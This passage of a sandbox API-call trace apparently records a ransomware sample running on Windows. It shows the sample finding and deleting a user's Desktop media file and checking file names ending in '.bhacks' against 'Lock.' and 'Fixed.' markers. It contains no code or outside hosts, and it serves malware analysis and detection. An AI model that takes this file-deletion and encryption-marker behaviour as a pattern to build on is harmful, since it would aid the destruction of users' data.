cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0104.350] CryptReleaseContext (hProv=0x9bf6e8, dwFlags=0x0) returned 1 [0104.350] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.351] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.351] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0104.351] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.351] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0104.351] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0104.351] FreeLibrary (hLibModule=0x76390000) returned 1 [0104.351] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.351] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.351] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.351] CloseHandle (hObject=0x458) returned 1 [0104.352] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.352] CloseHandle (hObject=0x44c) returned 1 [0104.353] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.354] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0104.354] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0104.354] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0104.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0104.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6450 [0104.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0104.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0104.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0104.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0104.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0104.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0104.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0104.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0104.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0104.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0104.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0104.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75858 [0104.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6450 | out: hHeap=0x2af0000) returned 1 [0104.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0104.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0104.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0104.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0104.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0104.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0104.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0104.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5f7e0 [0104.355] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/QgQCsu7ShKSSIL.m4a", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\QgQCsu7ShKSSIL.m4a", lpFilePart=0x8cedf4*="QgQCsu7ShKSSIL.m4a") returned 0x2a [0104.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f7e0 | out: hHeap=0x2af0000) returned 1 [0104.355] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\QgQCsu7ShKSSIL.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\qgqcsu7shkssil.m4a")) returned 0x20 [0104.355] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\QgQCsu7ShKSSIL.m4a", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 0x9a3b80 [0104.355] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\QgQCsu7ShKSSIL.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\qgqcsu7shkssil.m4a")) returned 1 [0104.675] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 0 [0104.675] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0104.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75858 | out: hHeap=0x2af0000) returned 1 [0104.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0104.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0104.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0104.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0104.675] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0104.696] TranslateMessage (lpMsg=0x8cf968) returned 0 [0104.696] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0104.696] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0104.696] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0104.696] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0104.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0104.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0104.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0104.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0104.697] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0104.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0104.697] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66f0 [0104.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0104.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0104.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0104.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0104.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0104.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0104.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0104.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0104.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0104.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0104.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0104.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0104.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75ba0 [0104.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0104.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0104.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0104.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0104.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0104.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0104.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0104.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0104.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0104.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0104.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0104.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0104.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0104.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0104.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0104.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0104.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0104.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0104.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5f6c0 [0104.698] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/QgQCsu7ShKSSIL.m4a", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\QgQCsu7ShKSSIL.m4a", lpFilePart=0x8cf650*="QgQCsu7ShKSSIL.m4a") returned 0x2a [0104.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0104.699] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\QgQCsu7ShKSSIL.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\qgqcsu7shkssil.m4a")) returned 0xffffffff [0104.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75ba0 | out: hHeap=0x2af0000) returned 1 [0104.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0104.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0104.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0104.699] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0104.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0104.699] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0104.699] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0104.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0104.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0104.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0104.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0104.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0104.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0104.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0104.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0104.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0104.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0104.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0104.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0104.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tab3I0y Y3.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0104.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ab3I0y Y3.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b3I0y Y3.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3I0y Y3.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I0y Y3.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0y Y3.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Y3.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Y3.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Y3.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y3.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0104.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0104.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0104.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0104.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0104.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0104.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0104.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0104.700] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0104.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0104.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0104.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0104.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0104.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0104.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0104.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0104.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0104.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0104.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0104.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0104.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0104.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0104.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0104.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0104.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0104.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2e) returned 0x2aa60d0 [0104.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tab3I0y Y3.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ab3I0y Y3.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b3I0y Y3.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3I0y Y3.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I0y Y3.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0y Y3.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Y3.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Y3.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Y3.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y3.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 